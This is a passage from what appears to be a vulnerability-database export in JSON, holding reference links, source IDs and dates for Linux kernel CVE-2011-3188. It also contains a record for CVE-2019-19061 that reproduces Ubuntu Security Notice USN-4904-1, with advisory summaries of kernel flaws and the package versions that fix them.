        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=43221"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20111465 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel-rt security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20120010 - security advisory"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1236-1"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1246-1"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2011-016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2011-016"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-backport-maverick vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1242-1"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1243-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-ti-omap4 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1228-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-ti-omap4 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1220-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-mvl-dove vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1245-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-ec2 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1239-1"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1253-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-mvl-dove vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1240-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-fsl-imx51 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1241-1"
      },
      {
        "title": "Debian Security Advisories: DSA-2310-1 linux-2.6 -- privilege escalation/denial of service/information leak",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=32718749d125111cbdd89954674b3eef"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2011-026",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2011-026"
      },
      {
        "title": "Debian Security Advisories: DSA-2303-2 linux-2.6 -- privilege escalation/denial of service/information leak",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=2a2d240162691a031ffdb625c608418b"
      },
      {
        "title": "VMware Security Advisories: VMware vSphere and vCOps updates to third party libraries",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=ebfa7ecfec1f973ff975279d7fce2976"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-backport-natty vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1256-1"
      },
      {
        "title": "function_level_granularity",
        "trust": 0.1,
        "url": "https://github.com/znd15/function_level_granularity "
      },
      {
        "title": "kernel_cve",
        "trust": 0.1,
        "url": "https://github.com/parkhomets/kernel_cve "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2011-3188"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-429"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-3188"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2011/08/23/2"
      },
      {
        "trust": 1.8,
        "url": "http://www.kernel.org/pub/linux/kernel/v3.x/changelog-3.1"
      },
      {
        "trust": 1.8,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=732658"
      },
      {
        "trust": 1.8,
        "url": "https://github.com/torvalds/linux/commit/6e5714eaf77d79ae1c8b47e3e040ff5411b717ec"
      },
      {
        "trust": 1.8,
        "url": "https://github.com/torvalds/linux/commit/bc0b96b54a21246e377122d54569eef71cec535f"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=6e5714eaf77d79ae1c8b47e3e040ff5411b717ec"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=bc0b96b54a21246e377122d54569eef71cec535f"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=bugtraq\u0026m=139447903326211\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "https://support.f5.com/csp/article/k15301?utm_source=f5support\u0026amp%3butm_medium=rss"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3188"
      },
      {
        "trust": 0.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=6e5714eaf77d79ae1c8b47e3e040ff5411b717ec"
      },
      {
        "trust": 0.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=bc0b96b54a21246e377122d54569eef71cec535f"
      },
      {
        "trust": 0.7,
        "url": "https://support.f5.com/csp/article/k15301?utm_source=f5support\u0026utm_medium=rss"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3191"
      },
      {
        "trust": 0.6,
        "url": "https://support.f5.com/csp/article/k15301"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4751/"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2699"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2497"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2928"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1833"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2213"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2723"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2695"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2496"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2484"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2495"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1576"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2494"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2905"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1020"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3209"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4110"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3363"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2492"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4067"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2700"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-3188.html"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/kb/docs/doc-11259"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2699.html"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/key/#package"
      },
      {
        "trust": 0.2,
        "url": "http://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-3191.html"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?l=bugtraq\u0026amp;m=139447903326211\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "https://support.f5.com/csp/article/k15301?utm_source=f5support\u0026amp;amp%3butm_medium=rss"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.rapid7.com/db/vulnerabilities/vmsa-2012-0013-cve-2011-3188"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=24018"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/1236-1/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4410"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4109"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4325"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0830"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4128"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-5029"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4108"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2761"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4577"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-5064"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4180"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0014"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1089"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4252"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4609"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3597"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4132"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4324"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4576"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0712"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2211"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2525"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2209"
      },
      {
        "trust": 0.1,
        "url": "http://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "http://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2491"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-ti-omap4/2.6.35-903.25"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1776"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-1220-1"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2496.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-3131.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2723.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-1585.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2942.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1585"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-1160.html"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2011-1065.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-1833.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2942"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2011-1386.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2484.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3347"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-3347.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3131"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1160"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2011-1241.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-3209.html"
      },
      {
        "trust": 0.1,
        "url": "https://docs.redhat.com/docs/en-us/red_hat_enterprise_linux/5/html/5.7_technical_notes/kernel.html#rhsa-2011-1386"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2695.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2009-4067.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3359"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2905.html"
      },
      {
        "trust": 0.1,
        "url": "https://docs.redhat.com/docs/en-us/red_hat_enterprise_linux/6/html/6.1_technical_notes/kernel.html#rhsa-2011-1465"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3353"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1162"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-1162.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3593"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1577"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-1577.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2494.html"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2011-1465.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-3593.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-4326.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4326"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-3359.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-3363.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-3353.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2383"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0879"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0058"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2518"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2137"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2689"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2373"
      },
      {
        "trust": 0.1,
        "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6205"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4077"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2384"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4008"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2375"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4494"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6206"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2182"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2313"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2372"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1179"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1088"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-1246-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/2.6.38-12.51"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-1245-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-mvl-dove/2.6.32-419.37"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-mvl-dove/2.6.32-219.37"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-1240-1"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-51133"
      },
      {
        "db": "VULMON",
        "id": "CVE-2011-3188"
      },
      {
        "db": "PACKETSTORM",
        "id": "116124"
      },
      {
        "db": "PACKETSTORM",
        "id": "105308"
      },
      {
        "db": "PACKETSTORM",
        "id": "105455"
      },
      {
        "db": "PACKETSTORM",
        "id": "106032"
      },
      {
        "db": "PACKETSTORM",
        "id": "107225"
      },
      {
        "db": "PACKETSTORM",
        "id": "125636"
      },
      {
        "db": "PACKETSTORM",
        "id": "106207"
      },
      {
        "db": "PACKETSTORM",
        "id": "106206"
      },
      {
        "db": "PACKETSTORM",
        "id": "106201"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-429"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-3188"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-51133"
      },
      {
        "db": "VULMON",
        "id": "CVE-2011-3188"
      },
      {
        "db": "PACKETSTORM",
        "id": "116124"
      },
      {
        "db": "PACKETSTORM",
        "id": "105308"
      },
      {
        "db": "PACKETSTORM",
        "id": "105455"
      },
      {
        "db": "PACKETSTORM",
        "id": "106032"
      },
      {
        "db": "PACKETSTORM",
        "id": "107225"
      },
      {
        "db": "PACKETSTORM",
        "id": "125636"
      },
      {
        "db": "PACKETSTORM",
        "id": "106207"
      },
      {
        "db": "PACKETSTORM",
        "id": "106206"
      },
      {
        "db": "PACKETSTORM",
        "id": "106201"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-429"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-3188"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2012-05-24T00:00:00",
        "db": "VULHUB",
        "id": "VHN-51133"
      },
      {
        "date": "2012-05-24T00:00:00",
        "db": "VULMON",
        "id": "CVE-2011-3188"
      },
      {
        "date": "2012-09-01T00:00:25",
        "db": "PACKETSTORM",
        "id": "116124"
      },
      {
        "date": "2011-09-23T20:11:00",
        "db": "PACKETSTORM",
        "id": "105308"
      },
      {
        "date": "2011-09-29T23:48:37",
        "db": "PACKETSTORM",
        "id": "105455"
      },
      {
        "date": "2011-10-20T22:58:37",
        "db": "PACKETSTORM",
        "id": "106032"
      },
      {
        "date": "2011-11-23T00:35:07",
        "db": "PACKETSTORM",
        "id": "107225"
      },
      {
        "date": "2014-03-11T01:16:40",
        "db": "PACKETSTORM",
        "id": "125636"
      },
      {
        "date": "2011-10-25T19:56:16",
        "db": "PACKETSTORM",
        "id": "106207"
      },
      {
        "date": "2011-10-25T19:55:57",
        "db": "PACKETSTORM",
        "id": "106206"
      },
      {
        "date": "2011-10-25T19:53:14",
        "db": "PACKETSTORM",
        "id": "106201"
      },
      {
        "date": "1900-01-01T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201108-429"
      },
      {
        "date": "2012-05-24T23:55:02.213000",
        "db": "NVD",
        "id": "CVE-2011-3188"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-02-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-51133"
      },
      {
        "date": "2020-07-29T00:00:00",
        "db": "VULMON",
        "id": "CVE-2011-3188"
      },
      {
        "date": "2023-02-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201108-429"
      },
      {
        "date": "2023-02-13T04:32:37.160000",
        "db": "NVD",
        "id": "CVE-2011-3188"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "107225"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-429"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel Authorization problem vulnerability",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-429"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-429"
      }
    ],
    "trust": 0.6
  }
}

var-201911-1414
Vulnerability from variot

A memory leak in the adis_update_scan_mode_burst() function in drivers/iio/imu/adis_buffer.c in the Linux kernel before 5.3.9 allows attackers to cause a denial of service (memory consumption), aka CID-9c0530e898f3. Linux Kernel Contains a resource exhaustion vulnerability. Vendors have confirmed this vulnerability CID-9c0530e898f3 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state. ========================================================================== Ubuntu Security Notice USN-4904-1 April 13, 2021

linux, linux-aws, linux-kvm, linux-lts-xenial, linux-raspi2, linux-snapdragon vulnerabilities ==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 16.04 LTS
  • Ubuntu 14.04 ESM

Summary:

Several security issues were fixed in the Linux kernel.

Software Description: - linux: Linux kernel - linux-aws: Linux kernel for Amazon Web Services (AWS) systems - linux-kvm: Linux kernel for cloud environments - linux-raspi2: Linux kernel for Raspberry Pi (V8) systems - linux-snapdragon: Linux kernel for Qualcomm Snapdragon processors - linux-lts-xenial: Linux hardware enablement kernel from Xenial for Trusty

Details:

Ben Harris discovered that the Linux kernel would strip extended privilege attributes of files when performing a failed unprivileged system call. A local attacker could use this to cause a denial of service. (CVE-2015-1350)

Andrey Konovalov discovered that the video4linux driver for Hauppauge HD PVR USB devices in the Linux kernel did not properly handle some error conditions. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16644)

It was discovered that the timer stats implementation in the Linux kernel allowed the discovery of a real PID value while inside a PID namespace. A local attacker could use this to expose sensitive information. (CVE-2017-5967)

Wen Xu discovered that the xfs file system implementation in the Linux kernel did not properly validate the number of extents in an inode. An attacker could use this to construct a malicious xfs image that, when mounted, could cause a denial of service (system crash). (CVE-2018-13095)

It was discovered that the Fujitsu ES network device driver for the Linux kernel did not properly check for errors in some situations, leading to a NULL pointer dereference. A local attacker could use this to cause a denial of service. (CVE-2019-16231)

It was discovered that the Marvell 8xxx Libertas WLAN device driver in the Linux kernel did not properly check for errors in certain situations, leading to a NULL pointer dereference. A local attacker could possibly use this to cause a denial of service. (CVE-2019-16232)

It was discovered that the ADIS16400 IIO IMU Driver for the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19061)

It was discovered that a race condition existed in the floppy device driver in the Linux kernel. An attacker with access to the floppy device could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-20261)

Olivier Benjamin, Norbert Manthey, Martin Mazein, and Jan H. Sch\xf6nherr discovered that the Xen paravirtualization bckend in the Linux kernel did not properly propagate errors to frontend drivers in some situations. An attacker in a guest VM could possibly use this to cause a denial of service (host domain crash). (CVE-2021-26930)

Jan Beulich discovered that multiple Xen backends in the Linux kernel did not properly handle certain error conditions under paravirtualization. An attacker in a guest VM could possibly use this to cause a denial of service (host domain crash). (CVE-2021-26931)

Jan Beulich discovered that the Xen netback backend in the Linux kernel did not properly handle certain error conditions under paravirtualization. An attacker in a guest VM could possibly use this to cause a denial of service (host domain crash). (CVE-2021-28038)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 16.04 LTS: linux-image-4.4.0-1091-kvm 4.4.0-1091.100 linux-image-4.4.0-1126-aws 4.4.0-1126.140 linux-image-4.4.0-1150-raspi2 4.4.0-1150.161 linux-image-4.4.0-1154-snapdragon 4.4.0-1154.164 linux-image-4.4.0-208-generic 4.4.0-208.240 linux-image-4.4.0-208-generic-lpae 4.4.0-208.240 linux-image-4.4.0-208-lowlatency 4.4.0-208.240 linux-image-4.4.0-208-powerpc-e500mc 4.4.0-208.240 linux-image-4.4.0-208-powerpc-smp 4.4.0-208.240 linux-image-4.4.0-208-powerpc64-emb 4.4.0-208.240 linux-image-4.4.0-208-powerpc64-smp 4.4.0-208.240 linux-image-aws 4.4.0.1126.131 linux-image-generic 4.4.0.208.214 linux-image-generic-lpae 4.4.0.208.214 linux-image-kvm 4.4.0.1091.89 linux-image-lowlatency 4.4.0.208.214 linux-image-powerpc-e500mc 4.4.0.208.214 linux-image-powerpc-smp 4.4.0.208.214 linux-image-powerpc64-emb 4.4.0.208.214 linux-image-powerpc64-smp 4.4.0.208.214 linux-image-raspi2 4.4.0.1150.150 linux-image-snapdragon 4.4.0.1154.146 linux-image-virtual 4.4.0.208.214

